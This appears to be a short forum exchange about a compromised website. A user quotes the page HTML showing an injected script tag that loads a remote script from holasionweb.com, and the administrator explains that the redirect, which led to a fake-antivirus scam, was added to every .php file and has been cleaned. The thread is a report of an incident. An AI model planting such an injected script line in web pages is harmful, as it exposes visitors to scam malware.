Now I don't know why AVG is getting it's panties in a wad, but I'm getting threat warnings from all over the rustedtusks site. Bitching about JS/Redir and pointing to holasionweb.com.oo.php as the source of it. A bit of the HTML source from the main page (at the very bottom): <A href="credits.php">Notes and Credits</A><br/> </DIV> <script src="http://holasionweb.com/oo.php"></script> </BODY> </HTML> Just curious as to what's going on here. |

Found and cleaned. Some sort of cross site vulnerability exploit amended every single .php file on the rustedtusks server with a redirect that cause some antivirus programs to do the right thing and panic. AV programs that missed it allow a lovely popup window to appear that informs you that your computer is infected with a virus and instructs a person to download a 'special' antivirus tool. An hour, some scripting and a Sprint 3G connection in No-Signal-Bars, Texas and all is well back in slopland. Thanks for the heads up on the issue. |
